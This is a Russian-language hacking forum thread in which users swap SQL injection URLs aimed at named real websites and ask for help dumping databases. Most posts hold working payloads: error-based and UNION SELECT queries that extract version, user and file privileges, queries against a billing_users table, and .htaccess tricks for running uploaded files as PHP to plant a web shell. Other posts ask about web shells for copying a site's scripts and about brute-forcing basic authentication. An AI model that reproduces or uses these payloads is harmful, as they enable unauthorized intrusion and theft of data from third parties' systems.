Code: http://chatmovil.terra.es/index.php?section=channel_list&viewing_category_type=1+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
что-то фантазии не хвататет: http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+order+by+36
Это MSSQL, скорее всего фильтруется, потому что при 1 or 1=@@version-- просто становится недоступен сайт
http://www.human-solutions.com/company/news_press_report_en.php?id=-195+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9+--+ file_priv:Y Не могу найти админку, phpmyadmin или ftp. Не могу прочитать файлы чтобы найти путь куда залить shell. Что можете посоветовать?
нет не блинд.... причины: 1)таблица находится в другой базе 2)таблица пустая 3)проблемы с кодировками решение: 1)придется смириться 2)для mysql4 ' UNION SELECT 1, count(*) FROM billing_users-- для mysql5 ' UNION SELECT 1, table_rows FROM information_schema.tables where table_name= 'billing_users'-- если вывело 0 значит таблица пустая 3)' UNION SELECT 1, unhex(hex(login)) FROM billing_users LIMIT 0,1 -- ' UNION SELECT 1, aes_decrypt(aes_encrypt(login,12),12) FROM billing_users LIMIT 0,1 --
нету у тебя там файл_прива, дядя http://www.human-solutions.com/company/news_press_report_en.php?id=-195+union+select+1,2,3,4,concat_ws(':',user(),user,file_priv),6,7,8,9 from mysql.user where user='tecmath'--+ tecmath@localhost:tecmath:N
Здравствуйте всем! Sql-inj начал заниматься недавно, всё очень хорошо получается, но возник вопрос есть ли софт, который может помочь сдампипть базу через inj?
При твоем запросе вылетает ошибка "Microsoft VBScript runtime error '800a000d' ". Это означает, что используется Microsoft Jet Database Engine и запросы передается на очень низком уровне, на которые вряд ли получится повлиять. Для EoGeneo: https://forum.antichat.ru/showpost.php?p=236188&postcount=3 - автоматический частичный\полный дампинг БД (mssql, mysql-5.*) и тут еще https://forum.antichat.ru/thread148915.html как одни из многих функций есть и дампинг
Подскажите плиз, делаю всё как тут http://bug-track.ru/showpost.php?p=49&postcount=1 т.е. имеется аплоадер файлов, + phpinfo() upload php запрещён. но я могу заливать любые другие файлы и .htaccess, я вставил туда AddType application/x-httpd-php .html .gif но сервер не выполняет как php, а отдаёт файл на закачку. ещё в phpinfo сказано что php подключен как CGI, может поэтому не раб? тода подсажите плиз как в CGI PHP подрубить другие расширрнеия с помощью .htaccess
спс, может быть. ша поишу инклудов в двиге, токо трабла в том как слить сайт полность (скрипты) подскажите плиз шелл или скрипт чтобы слить скрипты с сайта, wso2.4 не пакует в архив ((
Нужно поломать сайт с аунтификацией такого вида а-ля alert (JS). На вид подумал что сама аунтификация довольно старая, и возможно есть уязвимости. Пикча формы, на фоне - страница, открывающаяся после неуспешного входа (адреса счел нужным скрыть) http://s58.radikal.ru/i160/1005/34/9cb26e6c3bc2.png Такая штука отображается при доступе к фаилу http://site/admin.php. На пхп фаил не похоже, судя по форме неудачи, прописано где то в апаче. brutus-aet2 ом прогонять пробовал, выдает бред при разных настройках. По словарю он выдает каждый раз новые пароли, по подбору - тоже. Спасибо. ЗЫ: Поиск юзал. Просьба постить только по теме. ЗЗЫ: Если запостил тему не в том разделе, просьба переместить и отправить ссылку в ЛС. ЗЗЗЫ: Ломаю не ради интереса и не ради того, чтобы "нагадить".
мдаааа, ты уже топик вроде создавал, и тебе там совершенно ясно ответили, зачем здесь пишешь?! http://en.wikipedia.org/wiki/Basic_access_authentication alert() тут не причём, это не javascript.
